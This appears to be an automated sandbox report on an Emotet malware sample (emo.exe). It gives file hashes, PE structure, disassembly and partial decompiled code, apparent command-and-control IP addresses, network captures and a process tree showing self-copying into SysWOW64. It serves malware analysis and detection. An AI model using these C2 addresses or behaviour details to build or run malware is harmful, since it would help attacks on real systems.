	gaxq7wN4q8	Get hash	malicious	Browse	97.69.18.33
	1isequal9.arm	Get hash	malicious	Browse	72.238.255.130
	B7S4YwiJLF	Get hash	malicious	Browse	72.188.139.200
	vHVNRpNhIs	Get hash	malicious	Browse	65.35.98.22
	aWhBGJrwWz	Get hash	malicious	Browse	97.79.50.21
	cxvJueYLS4	Get hash	malicious	Browse	68.204.233.85
	PaVUnU0r3p	Get hash	malicious	Browse	173.170.188.138
	0tJClm2RJX	Get hash	malicious	Browse	97.96.159.101
	I1lRHeFtqX	Get hash	malicious	Browse	173.168.235.70
	PHvqpLRfRl.exe	Get hash	malicious	Browse	50.91.114.38
	FD6qpyHOPI	Get hash	malicious	Browse	184.89.14.255
	oaG6jOntjL	Get hash	malicious	Browse	71.43.252.117
	X7AvBM4NoO	Get hash	malicious	Browse	97.102.236.236
	lhAgWM449Y	Get hash	malicious	Browse	97.68.238.145
	tMA66IeqHu	Get hash	malicious	Browse	107.144.164.77
	en2hmUmzUR	Get hash	malicious	Browse	67.9.44.166
CableTicaCR	N3pBzXZZne	Get hash	malicious	Browse	186.15.24.113
	oBftD9JG5h.exe	Get hash	malicious	Browse	186.159.186.156
	knownconf.exe	Get hash	malicious	Browse	186.159.186.156
	Thanksgiving-Card.doc	Get hash	malicious	Browse	186.159.186.156
	Thanksgiving-Day-eCard.doc	Get hash	malicious	Browse	186.159.186.156
	cVEAJou1VVpN.exe	Get hash	malicious	Browse	186.159.186.156
CENTURYLINK-LEGACY-LIGHTCOREUS	bf2Xd5XNqv	Get hash	malicious	Browse	173.202.160.130
	uMxlFgugKt	Get hash	malicious	Browse	99.195.171.130
	Pm96d6X1Y8	Get hash	malicious	Browse	184.159.108.177
	VfNmYKR1b7	Get hash	malicious	Browse	207.119.166.119
	uiInKzkLQx	Get hash	malicious	Browse	64.238.249.90
	UcEBQV1ZS7	Get hash	malicious	Browse	184.159.53.109
	jSZ8nD73MZ	Get hash	malicious	Browse	99.195.15.255
	TCMKnazFHf	Get hash	malicious	Browse	69.179.220.20
	lLc1G9C259	Get hash	malicious	Browse	209.102.144.97
	4Fkt5QAGt1	Get hash	malicious	Browse	72.161.226.83
	qgQgEjI283	Get hash	malicious	Browse	99.195.171.120
	JRyLnlTR1O	Get hash	malicious	Browse	209.102.210.148
	4JQil8gLKd	Get hash	malicious	Browse	209.102.181.23
	RB1NsQ9LQf.exe	Get hash	malicious	Browse	209.102.187.47
	oBftD9JG5h.exe	Get hash	malicious	Browse	66.112.88.78

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.111194457335321
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	emo.exe
File size:	180224
MD5:	1d314c60cf2ab83672f258033f1c9fdb
SHA1:	a076655c3e4b48b2a074a7d37210adaea0e22f92
SHA256:	459f8d96d0c21300199c87ee798b594216732a27da6c3190f36b483df9faaabf
SHA512:	82f5b8d8b4eec5dac2220a9cef857be499e0a5c6ac6b4e095633bcdfeb7892dabfd5a3ae4b19833c2e635494855a59559c032f60eae0de7aba1eceec5592efee
SSDEEP:	3072:6XzE6a+Y65AsnY2H9cWkxSASTWHVST7n+5oouZ5M:uzbY65fR9cWkMASTWHgnEoou
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............P...P...Pl..QR..PL..Q..tP..zPRich...P................PE..L........................0...................@....@............

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x401919
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:	GUARD_CF
Time Stamp:	0x2EF7B716 [Wed Dec 21 05:03:18 1994 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	054b7d2027518d923046c03a250703b0

Entrypoint Preview

Instruction
push ebp
push esp
mov ecx, esi
push ecx
xchg esi, ecx
call 00007FA14CA69BBBh
xchg edx, edi
mov eax, 00000002h
push edx
shl eax, 1
mov ecx, eax
mov eax, ebx
mov edi, edx
mov edx, ebx
sub esp, ecx
mov dword ptr [esp], edx
xor ecx, ecx
or ecx, 02h
sub esp, 04h
shl ecx, 05h
cmp ecx, 00000159h
jnbe 00007FA14CA69F71h
sub eax, 10h
jne 00007FA14CA69F8Ah
and ebx, 00008000h
add ebx, 00000808h
dec esi
and esi, 40004001h
cmp ebx, esi
je 00007FA14CA69F65h
add esp, 24h
nop
nop
nop
nop
nop
nop
nop
mov dword ptr [ebp-04h], eax
push ebp
mov ebp, esp
push esi
sub esp, 00000088h
mov eax, dword ptr [ebp+10h]
mov ecx, dword ptr [ebp+0Ch]
mov edx, dword ptr [ebp+08h]
mov esi, dword ptr [0040402Ch]
mov dword ptr [ebp-58h], eax
mov dword ptr [ebp-5Ch], ecx
mov dword ptr [ebp-60h], edx
call esi
mov dword ptr [ebp-64h], eax
call 00007FA14CA69D86h
mov ecx, dword ptr [ebp-60h]
mov dword ptr [0040527Ch], ecx
mov edx, dword ptr [ebp-58h]
mov dword ptr [00405280h], edx
mov esi, dword ptr [ebp-5Ch]
mov dword ptr [00405278h], esi
mov dword ptr [ebp-68h], eax
call 00007FA14CA69B81h
call 00007FA14CA69D5Eh
mov ecx, dword ptr [00404034h]
mov dword ptr [esp], ecx
mov dword ptr [ebp-6Ch], eax
call 00007FA14CA6B207h

Rich Headers

Programming Language:

[ C ] VS2015 UPD1 build 23506
[IMP] VS2010 build 30319
[IMP] VS2015 build 23026

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4354	0xc8	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x27000	0x4140	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2c000	0x154	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x40c0	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x4000	0xc0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x24cc	0x3000	False	0.498453776042	data	5.69610691174	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x4000	0x838	0x1000	False	0.3046875	data	3.02034569562	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x5000	0x1f08	0x1000	False	0.109375	data	1.53583714414	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
DATA	0x7000	0x9861	0xa000	False	0.617065429688	data	6.59989433749	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
CONST	0x11000	0x6401	0x7000	False	0.696463448661	data	6.43333519721	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
Data	0x18000	0xef26	0xf000	False	0.755501302083	data	6.96026063595	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x27000	0x4140	0x5000	False	0.1634765625	data	3.52467749328	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x2c000	0x154	0x1000	False	0.0869140625	data	0.832521456064	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_DIALOG	0x27390	0xf4	data
RT_DIALOG	0x27488	0xf4	data
RT_DIALOG	0x27580	0xf4	data
RT_DIALOG	0x27678	0xf4	data
RT_DIALOG	0x27770	0xf2	data
RT_DIALOG	0x27868	0xec	data	Chinese	Taiwan
RT_DIALOG	0x27958	0xf4	data	Japanese	Japan
RT_DIALOG	0x27a50	0xfc	data	Korean	North Korea
RT_DIALOG	0x27a50	0xfc	data	Korean	South Korea
RT_DIALOG	0x27b50	0xec	data	Chinese	China
RT_DIALOG	0x27c40	0xd0	data
RT_DIALOG	0x27d10	0xd0	data
RT_DIALOG	0x27de0	0xd0	data
RT_DIALOG	0x27eb0	0xd0	data
RT_DIALOG	0x27f80	0xd0	data
RT_DIALOG	0x28050	0xca	data	Chinese	Taiwan
RT_DIALOG	0x28120	0xd0	data	English	United States
RT_DIALOG	0x281f0	0xca	data	Japanese	Japan
RT_DIALOG	0x282c0	0xd6	data	Korean	North Korea
RT_DIALOG	0x282c0	0xd6	data	Korean	South Korea
RT_DIALOG	0x28398	0xca	data	Chinese	China
RT_STRING	0x28468	0x54c	data
RT_STRING	0x289b8	0x55c	data
RT_STRING	0x28f18	0x504	data
RT_STRING	0x29420	0x55a	data
RT_STRING	0x29980	0x464	data
RT_STRING	0x29de8	0x21e	data	Chinese	Taiwan
RT_STRING	0x2a008	0x47e	data	English	United States
RT_STRING	0x2a488	0x2a6	data	Japanese	Japan
RT_STRING	0x2a730	0x286	data	Korean	North Korea
RT_STRING	0x2a730	0x286	data	Korean	South Korea
RT_STRING	0x2a9b8	0x1d6	data	Chinese	China
RT_VERSION	0x2ab90	0x5b0	data	English	United States

Imports

DLL	Import
mscms.dll	InstallColorProfileW
KERNEL32.dll	NotifyUILanguageChange, GetSystemInfo, GetConsoleProcessList, GetThreadPriority, GetSystemDefaultLCID, GetProcessIoCounters, GetCommandLineA, ApplicationRecoveryInProgress, AllocConsole, LocalFileTimeToFileTime
WINSPOOL.DRV	GetPrinterDataW
ole32.dll	CoRevokeMallocSpy, HBITMAP_UserMarshal, CoCreateInstance
urlmon.dll	CoInternetQueryInfo, MkParseDisplayNameEx
SHLWAPI.dll	StrRChrW
GDI32.dll	CloseMetaFile, SetMetaRgn, OffsetRgn, SetLayout
USER32.dll	IsDlgButtonChecked, GetMenuState, GetSysColor, ChildWindowFromPoint, GetLastInputInfo, TranslateMessage, DrawEdge, GetComboBoxInfo, DdeGetLastError, AddClipboardFormatListener, SendMessageCallbackW, DestroyAcceleratorTable, SetWindowsHookExW, ReplyMessage, AnimateWindow
msvcrt.dll	rand, fputs

Version Infos

Description	Data
LegalCopyright	Microsoft
MIMEType	application/x-java-applet;version=1.3.1\|application/x-java-bean;version=1.3.1\|application/x-java-applet;version=1.4\|application/x-java-bean;version=1.4\|application/x-java-applet;version=1.4.1\|application/x-java-bean;version=1.4.1
InternalName	Loft Plug-in
FileVersion	1, 5, 2, 50
CompanyName	MinnSoft / Sun Microsystems, Inc.
FileOpenName	Minn Applet\|JavaBeans\|Sola Applet\|MinnMinns\|Minn Applet\|SolaBeans
FileExtents	\|\|\|\|\|
ProductName	Sola Plug-in
ProductVersion	3, 4, 2, 50
FileDescription	ME15165 OPPD
OriginalFilename	c_gb18030.
Translation	0x0409 0x04e4

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	Taiwan
Japanese	Japan
Korean	North Korea
Korean	South Korea
Chinese	China
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
08/16/21-08:34:22.920882	ICMP	401	ICMP Destination Unreachable Network Unreachable			208.110.249.249	192.168.2.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 16, 2021 08:33:10.383763075 CEST	49739	8080	192.168.2.4	186.159.186.156
Aug 16, 2021 08:33:13.388292074 CEST	49739	8080	192.168.2.4	186.159.186.156
Aug 16, 2021 08:33:19.390625000 CEST	49739	8080	192.168.2.4	186.159.186.156
Aug 16, 2021 08:33:31.457182884 CEST	49742	80	192.168.2.4	200.54.111.170
Aug 16, 2021 08:33:34.530745983 CEST	49742	80	192.168.2.4	200.54.111.170
Aug 16, 2021 08:33:40.546823025 CEST	49742	80	192.168.2.4	200.54.111.170
Aug 16, 2021 08:33:52.650626898 CEST	49759	80	192.168.2.4	104.136.151.73
Aug 16, 2021 08:33:55.642044067 CEST	49759	80	192.168.2.4	104.136.151.73
Aug 16, 2021 08:34:01.642558098 CEST	49759	80	192.168.2.4	104.136.151.73
Aug 16, 2021 08:34:13.768285036 CEST	49760	80	192.168.2.4	66.112.88.78
Aug 16, 2021 08:34:16.768981934 CEST	49760	80	192.168.2.4	66.112.88.78
Aug 16, 2021 08:34:22.769300938 CEST	49760	80	192.168.2.4	66.112.88.78
Aug 16, 2021 08:34:34.851624012 CEST	49763	80	192.168.2.4	105.224.170.204
Aug 16, 2021 08:34:37.864233971 CEST	49763	80	192.168.2.4	105.224.170.204
Aug 16, 2021 08:34:43.880362034 CEST	49763	80	192.168.2.4	105.224.170.204

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 16, 2021 08:32:40.438606024 CEST	59123	53	192.168.2.4	8.8.8.8
Aug 16, 2021 08:32:40.463654995 CEST	53	59123	8.8.8.8	192.168.2.4
Aug 16, 2021 08:32:41.602586985 CEST	54531	53	192.168.2.4	8.8.8.8
Aug 16, 2021 08:32:41.630924940 CEST	53	54531	8.8.8.8	192.168.2.4
Aug 16, 2021 08:32:42.264413118 CEST	49714	53	192.168.2.4	8.8.8.8
Aug 16, 2021 08:32:42.290286064 CEST	53	49714	8.8.8.8	192.168.2.4
Aug 16, 2021 08:32:42.892396927 CEST	58028	53	192.168.2.4	8.8.8.8
Aug 16, 2021 08:32:42.918056011 CEST	53	58028	8.8.8.8	192.168.2.4
Aug 16, 2021 08:32:43.493257999 CEST	53097	53	192.168.2.4	8.8.8.8
Aug 16, 2021 08:32:43.537540913 CEST	53	53097	8.8.8.8	192.168.2.4
Aug 16, 2021 08:32:43.587064981 CEST	49257	53	192.168.2.4	8.8.8.8
Aug 16, 2021 08:32:43.613584995 CEST	53	49257	8.8.8.8	192.168.2.4
Aug 16, 2021 08:32:44.609926939 CEST	62389	53	192.168.2.4	8.8.8.8
Aug 16, 2021 08:32:44.635704994 CEST	53	62389	8.8.8.8	192.168.2.4
Aug 16, 2021 08:32:45.562563896 CEST	49910	53	192.168.2.4	8.8.8.8
Aug 16, 2021 08:32:45.587519884 CEST	53	49910	8.8.8.8	192.168.2.4
Aug 16, 2021 08:32:46.461008072 CEST	55854	53	192.168.2.4	8.8.8.8
Aug 16, 2021 08:32:46.488846064 CEST	53	55854	8.8.8.8	192.168.2.4
Aug 16, 2021 08:32:47.367415905 CEST	64549	53	192.168.2.4	8.8.8.8
Aug 16, 2021 08:32:47.395843029 CEST	53	64549	8.8.8.8	192.168.2.4
Aug 16, 2021 08:32:48.447093010 CEST	63153	53	192.168.2.4	8.8.8.8
Aug 16, 2021 08:32:48.472089052 CEST	53	63153	8.8.8.8	192.168.2.4
Aug 16, 2021 08:32:49.186382055 CEST	52991	53	192.168.2.4	8.8.8.8
Aug 16, 2021 08:32:49.221892118 CEST	53	52991	8.8.8.8	192.168.2.4
Aug 16, 2021 08:32:49.968328953 CEST	53700	53	192.168.2.4	8.8.8.8
Aug 16, 2021 08:32:49.995773077 CEST	53	53700	8.8.8.8	192.168.2.4
Aug 16, 2021 08:32:50.679575920 CEST	51726	53	192.168.2.4	8.8.8.8
Aug 16, 2021 08:32:50.706286907 CEST	53	51726	8.8.8.8	192.168.2.4
Aug 16, 2021 08:32:51.504933119 CEST	56794	53	192.168.2.4	8.8.8.8
Aug 16, 2021 08:32:51.535342932 CEST	53	56794	8.8.8.8	192.168.2.4
Aug 16, 2021 08:32:52.195557117 CEST	56534	53	192.168.2.4	8.8.8.8
Aug 16, 2021 08:32:52.230351925 CEST	53	56534	8.8.8.8	192.168.2.4
Aug 16, 2021 08:32:53.050386906 CEST	56627	53	192.168.2.4	8.8.8.8
Aug 16, 2021 08:32:53.075479031 CEST	53	56627	8.8.8.8	192.168.2.4
Aug 16, 2021 08:32:54.715420961 CEST	56621	53	192.168.2.4	8.8.8.8
Aug 16, 2021 08:32:54.743305922 CEST	53	56621	8.8.8.8	192.168.2.4
Aug 16, 2021 08:32:55.799916029 CEST	63116	53	192.168.2.4	8.8.8.8
Aug 16, 2021 08:32:55.827470064 CEST	53	63116	8.8.8.8	192.168.2.4
Aug 16, 2021 08:32:56.640269041 CEST	64078	53	192.168.2.4	8.8.8.8
Aug 16, 2021 08:32:56.665807962 CEST	53	64078	8.8.8.8	192.168.2.4
Aug 16, 2021 08:33:14.853199959 CEST	64801	53	192.168.2.4	8.8.8.8
Aug 16, 2021 08:33:14.885746002 CEST	53	64801	8.8.8.8	192.168.2.4
Aug 16, 2021 08:33:32.497986078 CEST	61721	53	192.168.2.4	8.8.8.8
Aug 16, 2021 08:33:32.537879944 CEST	53	61721	8.8.8.8	192.168.2.4
Aug 16, 2021 08:33:33.419739008 CEST	51255	53	192.168.2.4	8.8.8.8
Aug 16, 2021 08:33:33.458929062 CEST	53	51255	8.8.8.8	192.168.2.4
Aug 16, 2021 08:33:33.775821924 CEST	61522	53	192.168.2.4	8.8.8.8
Aug 16, 2021 08:33:33.808990955 CEST	53	61522	8.8.8.8	192.168.2.4
Aug 16, 2021 08:33:33.979856014 CEST	52337	53	192.168.2.4	8.8.8.8
Aug 16, 2021 08:33:34.015535116 CEST	53	52337	8.8.8.8	192.168.2.4
Aug 16, 2021 08:33:34.347860098 CEST	55046	53	192.168.2.4	8.8.8.8
Aug 16, 2021 08:33:34.383598089 CEST	53	55046	8.8.8.8	192.168.2.4
Aug 16, 2021 08:33:34.822419882 CEST	49612	53	192.168.2.4	8.8.8.8
Aug 16, 2021 08:33:34.855324984 CEST	53	49612	8.8.8.8	192.168.2.4
Aug 16, 2021 08:33:35.197984934 CEST	49285	53	192.168.2.4	8.8.8.8
Aug 16, 2021 08:33:35.241513014 CEST	53	49285	8.8.8.8	192.168.2.4
Aug 16, 2021 08:33:35.293951988 CEST	50601	53	192.168.2.4	8.8.8.8
Aug 16, 2021 08:33:35.318708897 CEST	53	50601	8.8.8.8	192.168.2.4
Aug 16, 2021 08:33:35.874000072 CEST	60875	53	192.168.2.4	8.8.8.8
Aug 16, 2021 08:33:35.909321070 CEST	53	60875	8.8.8.8	192.168.2.4
Aug 16, 2021 08:33:36.549724102 CEST	56448	53	192.168.2.4	8.8.8.8
Aug 16, 2021 08:33:36.582562923 CEST	53	56448	8.8.8.8	192.168.2.4
Aug 16, 2021 08:33:37.318675995 CEST	59172	53	192.168.2.4	8.8.8.8
Aug 16, 2021 08:33:37.350991011 CEST	53	59172	8.8.8.8	192.168.2.4
Aug 16, 2021 08:33:37.822719097 CEST	62420	53	192.168.2.4	8.8.8.8
Aug 16, 2021 08:33:37.859389067 CEST	53	62420	8.8.8.8	192.168.2.4
Aug 16, 2021 08:33:49.397672892 CEST	60579	53	192.168.2.4	8.8.8.8
Aug 16, 2021 08:33:49.433067083 CEST	53	60579	8.8.8.8	192.168.2.4
Aug 16, 2021 08:33:49.621822119 CEST	50183	53	192.168.2.4	8.8.8.8
Aug 16, 2021 08:33:49.654438972 CEST	53	50183	8.8.8.8	192.168.2.4
Aug 16, 2021 08:33:51.081753016 CEST	61531	53	192.168.2.4	8.8.8.8
Aug 16, 2021 08:33:51.118573904 CEST	53	61531	8.8.8.8	192.168.2.4
Aug 16, 2021 08:34:25.839478970 CEST	49228	53	192.168.2.4	8.8.8.8
Aug 16, 2021 08:34:25.881095886 CEST	53	49228	8.8.8.8	192.168.2.4
Aug 16, 2021 08:34:27.303328037 CEST	59794	53	192.168.2.4	8.8.8.8
Aug 16, 2021 08:34:27.354499102 CEST	53	59794	8.8.8.8	192.168.2.4

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: emo.exe PID: 6700 Parent PID: 5860

General

Start time:	08:32:47
Start date:	16/08/2021
Path:	C:\Users\user\Desktop\emo.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\emo.exe'
Imagebase:	0x400000
File size:	180224 bytes
MD5 hash:	1D314C60CF2AB83672F258033F1C9FDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.655519273.00000000041D1000.00000020.00000001.sdmp, Author: Joe Security Rule: Emotet, Description: Emotet Payload, Source: 00000000.00000002.655519273.00000000041D1000.00000020.00000001.sdmp, Author: kevoreilly
Reputation:	low

Analysis Process: emo.exe PID: 6728 Parent PID: 6700

General

Start time:	08:32:47
Start date:	16/08/2021
Path:	C:\Users\user\Desktop\emo.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\emo.exe
Imagebase:	0x400000
File size:	180224 bytes
MD5 hash:	1D314C60CF2AB83672F258033F1C9FDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000002.670974631.00000000026F1000.00000020.00000001.sdmp, Author: Joe Security Rule: Emotet, Description: Emotet Payload, Source: 00000001.00000002.670974631.00000000026F1000.00000020.00000001.sdmp, Author: kevoreilly
Reputation:	low

Analysis Process: aspcolorer.exe PID: 7008 Parent PID: 568

General

Start time:	08:32:53
Start date:	16/08/2021
Path:	C:\Windows\SysWOW64\aspcolorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\aspcolorer.exe
Imagebase:	0x400000
File size:	180224 bytes
MD5 hash:	1D314C60CF2AB83672F258033F1C9FDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000005.00000002.668324043.0000000002D61000.00000020.00000001.sdmp, Author: Joe Security Rule: Emotet, Description: Emotet Payload, Source: 00000005.00000002.668324043.0000000002D61000.00000020.00000001.sdmp, Author: kevoreilly
Reputation:	low

Analysis Process: aspcolorer.exe PID: 7032 Parent PID: 7008

General

Start time:	08:32:54
Start date:	16/08/2021
Path:	C:\Windows\SysWOW64\aspcolorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\aspcolorer.exe
Imagebase:	0x400000
File size:	180224 bytes
MD5 hash:	1D314C60CF2AB83672F258033F1C9FDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000006.00000002.917142816.0000000002521000.00000020.00000001.sdmp, Author: Joe Security Rule: Emotet, Description: Emotet Payload, Source: 00000006.00000002.917142816.0000000002521000.00000020.00000001.sdmp, Author: kevoreilly
Reputation:	low

Analysis Process: svchost.exe PID: 7092 Parent PID: 568

General

Start time:	08:32:56
Start date:	16/08/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: svchost.exe PID: 6240 Parent PID: 568

General

Start time:	08:33:14
Start date:	16/08/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: svchost.exe PID: 4864 Parent PID: 568

General

Start time:	08:33:23
Start date:	16/08/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: svchost.exe PID: 6452 Parent PID: 568

General

Start time:	08:33:30
Start date:	16/08/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: emo.exe PID: 6700 Parent PID: 5860 emo.exeCOMMON

Execution Graph

Execution Coverage:	6.9%
Dynamic/Decrypted Code Coverage:	58.1%
Signature Coverage:	17.1%
Total number of Nodes:	105
Total number of Limit Nodes:	9

Executed Functions

Function 041B2000, Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 65
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT ref: 041B203E
NtAllocateVirtualMemory.NTDLL ref: 041B20C5

Strings

r, xrefs: 041B2065
Z, xrefs: 041B2071
l, xrefs: 041B207D
l, xrefs: 041B2085
y, xrefs: 041B2069
l, xrefs: 041B2081
A, xrefs: 041B2079
w, xrefs: 041B2075
YYYYYocateVirtuaYMemoYYYYYYYYYYYYYYY, xrefs: 041B202B

Memory Dump Source

Source File: 00000000.00000002.655502185.00000000041B0000.00000040.00000001.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000000.00000002.655508379.00000000041B6000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41b0000_emo.jbxd

Similarity

API ID: AllocateMemoryVirtualmemcpy
String ID: A$YYYYYocateVirtuaYMemoYYYYYYYYYYYYYYY$Z$l$l$l$r$w$y
API String ID: 2505947351-868024915
Opcode ID: 6b0e9b7bc1387b8e7482af080e0c29f924dc7a5b565d90b1175c9ee7780a9e83
Instruction ID: 2f03b04e0bdc187e852e500ca249e08ac5e3f2edc212029f82ca8236c8a7b28d
Opcode Fuzzy Hash: 6b0e9b7bc1387b8e7482af080e0c29f924dc7a5b565d90b1175c9ee7780a9e83
Instruction Fuzzy Hash: D0314970D04248CBEB10CFA8D44478DFFB1AF49318F14C199D858AB342C776A946CF91

Uniqueness

Uniqueness Score: -1.00%

Function 041B1EF0, Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 74
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT ref: 041B1F51
NtProtectVirtualMemory.NTDLL ref: 041B1FE3

Strings

w, xrefs: 041B1F77
V, xrefs: 041B1F7B
@, xrefs: 041B1F66
yyProtectairtual emory, xrefs: 041B1F13
M, xrefs: 041B1F7F
Z, xrefs: 041B1F73

Memory Dump Source

Source File: 00000000.00000002.655502185.00000000041B0000.00000040.00000001.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000000.00000002.655508379.00000000041B6000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41b0000_emo.jbxd

Similarity

API ID: MemoryProtectVirtualmemcpy
String ID: @$M$V$Z$w$yyProtectairtual emory
API String ID: 2440499307-3039725267
Opcode ID: 67efbeef0b2c234e87a641adf4889f5509bdd5de559c0b3d9e9a1dcdb7bc7f8c
Instruction ID: 258b3050fac70a29679b653c869482202e3c9907dfc2aa737eb05aaddb01f80f
Opcode Fuzzy Hash: 67efbeef0b2c234e87a641adf4889f5509bdd5de559c0b3d9e9a1dcdb7bc7f8c
Instruction Fuzzy Hash: 8231D3B5D042188FDB14DF68C9807DEBBF0BB48354F1085AED858AB341D735AA45CF91

Uniqueness

Uniqueness Score: -1.00%

Function 004015E7, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 119
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E004015E7() {
				void* _v16;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				struct _SYSTEM_INFO _v72;
				intOrPtr _v84;
				int _v88;
				char _v92;
				intOrPtr _v96;
				struct _SYSTEM_INFO* _v104;
				char* _v108;
				intOrPtr _v112;
				int _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				intOrPtr _v136;
				intOrPtr _v144;
				signed int _v148;
				intOrPtr _v160;
				signed int _v164;
				intOrPtr _v172;
				intOrPtr _v176;
				int _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				int _v192;
				intOrPtr _v196;
				signed int _v197;
